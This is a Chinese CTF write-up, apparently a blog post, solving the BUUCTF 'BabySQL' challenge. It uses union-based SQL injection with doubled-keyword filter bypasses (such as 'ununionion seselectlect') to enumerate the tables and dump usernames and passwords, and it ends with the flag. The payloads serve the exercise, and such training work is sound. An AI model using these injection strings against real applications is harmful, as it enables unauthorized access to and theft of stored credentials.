[极客大挑战 2019]BabySQL—3.20BUUCTF练习day4(3)

[极客大挑战 2019]BabySQL-3.20BUUCTF练习day4(3)

做题过程

打开是以下页面(前几天有它的第一版第二版出现)输入1'

回显以下内容(还是字符型以单引号闭合,因为有报错信息回显)
输入1' order by 4%23回显成这个
被过滤了

先不管列数看看

输入1' union select 1,2%23判断显示位在哪里
那就使用以下双写绕过

输入1' ununionion seselectlect 1,2%23双写绕过,判断显示位这里显示列数不相同,那么为什么会有这个报错呢

这是因为union 的特性

你要查询语句的字段数量必须要和服务端数据库的查询语句字段数量要一致(指的是union前后的select后面的数字(例如刚刚的查询语句中的1,2字段数是2因为在数据库查询字段数不同所以报错)

那就试一试
1' ununionion seselectlect 1,2,3%23

好啦✔回显正确,之后就使用双写绕过

现在知道了列数(字段数)也知道了回显位(将数据回显在客户端屏幕上的位置)

该查询库名和用户名

输入-1' ununionion seselectlect 1,database(),user()%23
根据联合查询,该查询表名了

输入-1' ununionion seselectlect 1,group_concat(table_name),3 from information_schema.tables where schema_name='geek'%23
修改为-1' ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whewherere table_schema='geek'%23
我们查询b4bsql这个表里面的字段名

输入-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whewherere table_name='b4bsql'%23
查询字段内容

输入
-1' ununionion seselectlect 1,group_concat(id,0x3A,username,0x3A,password),3 frfromom b4bsql%23
那就再输入-1' ununionion seselectlect 1,group_concat(id,0x3A,username,0x3A,passwoorrd),3 frfromom b4bsql%23

得到flag
flag{0bbd78c4-ad10-4e17-92d7-72d0022bb992}

相关推荐
Broken Arrows13 分钟前
Linux学习——管理网络安全(二十一)
linux·学习·web安全
程序员的世界你不懂1 小时前
【Flask】测试平台开发,新增说明书编写和展示功能 第二十三篇
java·前端·数据库
自学也学好编程1 小时前
【数据库】Redis详解:内存数据库与缓存之王
数据库·redis
爱隐身的官人1 小时前
cfshow-web入门-php特性
python·php·ctf
JAVA不会写2 小时前
在Mybatis plus中如何使用自定义Sql
数据库·sql
IT 小阿姨(数据库)2 小时前
PgSQL监控死元组和自动清理状态的SQL语句执行报错ERROR: division by zero原因分析和解决方法
linux·运维·数据库·sql·postgresql·centos
grrrr_12 小时前
【工具类】Nuclei YAML POC 编写以及批量检测
网络·安全·web安全
ChinaRainbowSea2 小时前
7. LangChain4j + 记忆缓存详细说明
java·数据库·redis·后端·缓存·langchain·ai编程
骥龙2 小时前
XX汽集团数字化转型:全生命周期网络安全、数据合规与AI工业物联网融合实践
人工智能·物联网·web安全
小马学嵌入式~3 小时前
嵌入式 SQLite 数据库开发笔记
linux·c语言·数据库·笔记·sql·学习·sqlite